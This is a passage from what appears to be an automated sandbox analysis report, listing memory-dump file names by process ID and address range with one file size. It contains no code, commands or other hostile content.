                                                                                                                                                                                                                                                                                                                                                • memory/5000-360-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                                                                                • memory/5000-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5040-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5140-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5208-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5312-487-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5436-496-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5440-497-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5472-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5556-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5772-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5816-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5848-461-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5880-463-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5912-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5936-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5972-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5984-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5996-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/6028-474-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/6060-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/6092-478-0x0000000000000000-mapping.dmp